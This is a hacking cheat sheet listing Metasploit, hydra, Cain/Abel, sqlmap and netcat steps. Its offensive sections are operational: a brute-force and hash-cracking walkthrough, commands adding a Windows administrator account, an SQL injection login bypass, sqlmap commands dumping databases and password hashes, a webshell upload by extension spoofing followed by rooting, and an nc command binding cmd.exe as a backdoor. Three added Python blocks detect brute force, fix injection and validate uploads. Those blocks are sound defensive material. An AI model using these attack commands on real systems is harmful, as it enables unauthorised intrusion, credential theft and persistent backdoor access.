
===METASPLOIT===

search vulnerability_name
use exploit/name
show payloads
set payload payload_name
show options
set RHOST target_host
show options
exploit

===Meterpreter===

changing directory to a path with spaces

cd /"Program Files"/"Internet Explorer"

===Cain===
1: set target IP
2: enumerate users
3: then use hydra -l user -P rockyou.txt ftp://ip
4: reconnect with the user
5: install Abel
6: reconnect and go to hashes
7: find admin ending with 500
8: send to cracker
9: reset initial position
10: and start; the password will be cracked. Now log in with admin and create a new user
11: net user username password /add (for adding users)
12: net localgroup administrators username /add (for adding as an administrator)

NULL SESSION COMMAND

net use \\IP_ADDRESS\ipc$ "" /user:""

===NESSUS===
1: start the nessus service
/etc/init.d/nessusd start
2: start scanning
3: find the exploit name, something like MS17_010_eternalblue
4: exploit

===NMAP===

{Tools needed: nmap}

nmap -A <IP address>

===hydra===

hydra -l username -P /path/to/wordlist ftp://ip (if you know the username)

hydra -L /path/to/userlist -P /path/to/wordlist ftp://ip (if you don't know the username or password)
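From the defender's side, a run of the hydra commands above shows up in the FTP server log as a burst of FAIL LOGIN events from one client, often with a different username each time (the -L form). The following is an added example, not part of the original cheat sheet: it parses constructed vsftpd-style log lines (the sample lines, IPs and usernames are made up) and flags any client that fails at least `threshold` logins inside a sliding window, reporting how many distinct usernames were tried and whether a successful login followed. The log format and the threshold of 5 are assumptions for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed vsftpd-style log lines (not taken from the original page):
# one client fails six times with six different usernames in ten seconds,
# another client fails once, and the first client finally logs in.
SAMPLE_LOG = """\
Sat Jan 20 12:00:01 2024 [pid 2] [admin] FAIL LOGIN: Client "10.0.0.5"
Sat Jan 20 12:00:02 2024 [pid 2] [root] FAIL LOGIN: Client "10.0.0.5"
Sat Jan 20 12:00:03 2024 [pid 2] [ftp] FAIL LOGIN: Client "10.0.0.5"
Sat Jan 20 12:00:04 2024 [pid 3] [bob] FAIL LOGIN: Client "10.0.0.9"
Sat Jan 20 12:00:05 2024 [pid 2] [test] FAIL LOGIN: Client "10.0.0.5"
Sat Jan 20 12:00:07 2024 [pid 2] [guest] FAIL LOGIN: Client "10.0.0.5"
Sat Jan 20 12:00:10 2024 [pid 2] [user] FAIL LOGIN: Client "10.0.0.5"
Sat Jan 20 12:00:11 2024 [pid 2] [user] OK LOGIN: Client "10.0.0.5"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d{1,2} \d{2}:\d{2}:\d{2} \d{4}) '
    r'\[pid \d+\] \[(?P<user>[^\]]*)\] (?P<result>FAIL|OK) LOGIN: Client "(?P<ip>[^"]+)"'
)


def parse(log_text):
    """Yield (timestamp, user, result, ip) for every line matching the assumed format."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m.group("ts"), "%a %b %d %H:%M:%S %Y")
            yield ts, m.group("user"), m.group("result"), m.group("ip")


def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return {ip: {"failures": n, "users": k, "later_success": bool}} for every
    client with at least `threshold` FAIL LOGIN events inside one sliding window.
    Lines are assumed to be in chronological order, as a log file normally is."""
    fails = defaultdict(list)      # ip -> [(ts, user), ...]
    successes = defaultdict(list)  # ip -> [ts, ...]
    for ts, user, result, ip in parse(log_text):
        if result == "FAIL":
            fails[ip].append((ts, user))
        else:
            successes[ip].append(ts)

    flagged = {}
    for ip, events in fails.items():
        start = 0
        for end in range(len(events)):
            # shrink the window from the left until it spans at most `window`
            while events[end][0] - events[start][0] > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                in_window = events[start:end + 1]
                last_fail = events[end][0]
                flagged[ip] = {
                    "failures": count,
                    "users": len({u for _, u in in_window}),
                    # a success after the burst is the case worth paging on
                    "later_success": any(t >= last_fail for t in successes[ip]),
                }
    return flagged


if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_LOG).items():
        print(ip, info)
```

The distinct-user count separates a password-spray or user-list run (-L) from a single user being guessed (-l); the `later_success` flag marks the bursts that actually ended in a login, which is the alert to handle first. Rate limiting at the FTP service itself (or fail2ban-style blocking on the same log) is the mitigation this detection complements.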
===SQL INJECTION===

{Tools needed: sqlmap}

test' or 'a'='a (entered in both the username and password fields)


sqlmap -u LINK --dbs ==> to list databases
sqlmap -u LINK -D dbname --tables ==> to list the tables of a database
sqlmap -u LINK -D dbname -T tblname --columns ==> to list the columns of a table
sqlmap -u LINK -D dbname -T tblname --dump ==> to dump the table to a file
sqlmap -u LINK -D dbname --columns ==> to show all available columns of the selected database

sqlmap -u "LINK" -o -b --current-user --is-dba ===> to check whether the current user is DBA
sqlmap -u "LINK" -v 1 --current-user --passwords ===> to get the current user's password (hash)
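Why the `test' or 'a'='a` probe logs anyone in, and what the fix looks like, is easiest to see with the vulnerable query next to its parameterised form. The block below is an added example, not code from the original page: it builds a constructed in-memory SQLite table with one user (the table, the `admin`/`s3cret` pair and the plaintext password column are for the demo only), runs the probe through a login that concatenates user input into the SQL text, then through one that binds the values as parameters, and adds a small log/WAF heuristic for the probe pattern.

```python
import re
import sqlite3

# Constructed in-memory user table (not from the original page). A real
# application would store a password hash, not the password itself.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    conn.commit()
    return conn


# The probe string from the cheat sheet, entered in both login fields.
BYPASS = "test' or 'a'='a"


def login_vulnerable(conn, username, password):
    """Builds the SQL text by string formatting, so the quote in the input closes
    the literal and the rest of the input becomes SQL. With BYPASS in both
    fields the statement reads
       ... WHERE username = 'test' or 'a'='a' AND password = 'test' or 'a'='a'
    and because AND binds tighter than OR, the trailing 'a'='a' is true for
    every row: the first user in the table (admin here) is returned."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterised query: the values travel separately from the SQL text, so
    the quote is just one more character of the string being compared."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def looks_like_injection(value):
    """Cheap heuristic for request logs or a WAF rule: a quote followed by
    OR/AND. Good for alerting; not a substitute for parameterised queries."""
    return re.search(r"['\"]\s*(or|and)\s+", value, re.IGNORECASE) is not None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable login with probe:", login_vulnerable(db, BYPASS, BYPASS))
    print("safe login with probe:      ", login_safe(db, BYPASS, BYPASS))
    print("probe flagged:              ", looks_like_injection(BYPASS))
```

The same bind-parameter fix is what sqlmap's enumeration depends on being absent: every `-u LINK` command in the list above only works when some parameter of LINK is concatenated into a query the way `login_vulnerable` does it.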

===Uploading Shell & Server Rooting===

{tools needed: root script and shell}

1: SQL injection for login
2: there should be a link vulnerable to sqlmap
3: get admin username and password
4: log in as admin
5: find upload button/form
6: upload webshell by changing the extension to .jpeg/.png etc.
7: write the complete filename in the path and press enter to get cmd access, or type "cmd=uname -a" to get system info
8: if rooted there should be a "#" sign in the terminal, otherwise a "$"
9: find some rooting script with ".c" extension for rooting
10: commands for compiling the ".c" file
gcc program-source-code.c -o executable-file-name
(or: make executable-file-name, which builds it from executable-file-name.c)
./executable-file-name
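Step 6 works only when the upload handler trusts the file name. The added example below (not code from the original page) is the server-side check that defeats a renamed shell: it allows only image extensions, rejects double extensions such as `shell.php.jpeg`, requires the file's leading bytes to match the real signature of the claimed image type, scans for script markers to catch an image with PHP appended, and stores the file under a server-chosen random name. The sample uploads at the bottom are constructed byte strings, not real files, and the signature table and marker list are assumptions for the example.

```python
import os
import secrets

# Leading bytes (file signatures) each allowed extension must start with.
SIGNATURES = {
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
}
# Extensions that some web servers will execute even when they are not last.
SCRIPT_EXTENSIONS = {"php", "php3", "php5", "phtml", "phar", "asp", "aspx", "jsp"}
# Byte markers whose presence in an "image" is reason enough to reject it.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<%", b"<script")


def check_upload(filename, data):
    """Return (accepted, reason) for an uploaded file name and its bytes."""
    parts = filename.lower().split(".")
    ext = "." + parts[-1] if len(parts) > 1 else ""
    if ext not in SIGNATURES:
        return False, "extension not allowed"
    if any(p in SCRIPT_EXTENSIONS for p in parts[1:-1]):
        return False, "double extension"
    if not data.startswith(SIGNATURES[ext]):
        return False, "content does not match extension"
    if any(marker in data for marker in SCRIPT_MARKERS):
        return False, "script marker inside image"
    return True, "ok"


def storage_name(filename):
    """Server-chosen random name: the client's file name never reaches the disk."""
    ext = os.path.splitext(filename.lower())[1]
    return secrets.token_hex(16) + ext


# Constructed samples (not real files): a PHP shell given a .png name, a
# minimal PNG header, a PNG header with PHP appended, and a double extension.
SHELL_AS_PNG = ("shell.png", b"<?php system($_GET['cmd']); ?>")
REAL_PNG = ("photo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 32)
POLYGLOT = ("photo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 8 + b"<?php echo 1; ?>")
DOUBLE_EXT = ("shell.php.jpeg", b"\xff\xd8\xff" + b"\x00" * 8)

if __name__ == "__main__":
    for name, content in (SHELL_AS_PNG, REAL_PNG, POLYGLOT, DOUBLE_EXT):
        ok, why = check_upload(name, content)
        print(f"{name:16} -> {'store as ' + storage_name(name) if ok else why}")
```

Two things the check cannot do on its own: the marker scan is a heuristic (a production service should re-encode the image with an image library so nothing but pixels survives), and none of this matters if the upload directory is served with script execution enabled, so the directory must sit outside the web root or have execution disabled in the web server configuration.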

===nc commands for backdoor in system without web===

1: go to the hacker machine and open tftp from tools
2: tftp -i IP get nc.exe
3: nc -L -p 4444 -e cmd.exe -d
